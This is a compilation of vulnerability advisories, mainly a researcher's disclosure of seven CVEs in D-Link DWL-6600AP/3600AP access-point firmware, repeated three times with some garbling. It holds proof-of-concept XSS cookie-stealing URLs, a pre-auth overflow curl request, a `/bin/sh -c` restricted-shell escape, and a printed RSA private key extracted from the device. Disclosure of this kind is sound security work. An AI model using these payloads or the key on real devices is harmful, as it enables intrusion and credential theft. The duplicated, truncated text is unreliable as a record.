A vulnerability in the Link Layer Discovery Protocol (LLDP) subsystem of Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch Software could allow an adjacent, unauthenticated attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges. The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to the targeted device. A successful exploit may lead to a buffer overflow condition that could either cause a DoS condition or allow the attacker to execute arbitrary code with root privileges. Note: This vulnerability cannot be exploited by transit traffic through the device; the crafted packet must be targeted to a directly connected interface. This vulnerability affects Cisco Nexus 9000 Series Fabric Switches in ACI mode if they are running a Cisco Nexus 9000 Series ACI Mode Switch Software release prior to 13.2(7f) or any 14.x release

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. D-Link 6600-AP and DWL-3600AP The device contains a cryptographic strength vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the `/bin/sh -c wget` sequence. D-Link 6600-AP and DWL-3600AP Devices have vulnerabilities related to authorization, permissions, and access control.Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. There are currently no detailed details of the vulnerability provided. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 has a permission and access control issue vulnerability. An attacker could exploit this vulnerability to gain access to a restricted CLI shell. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB 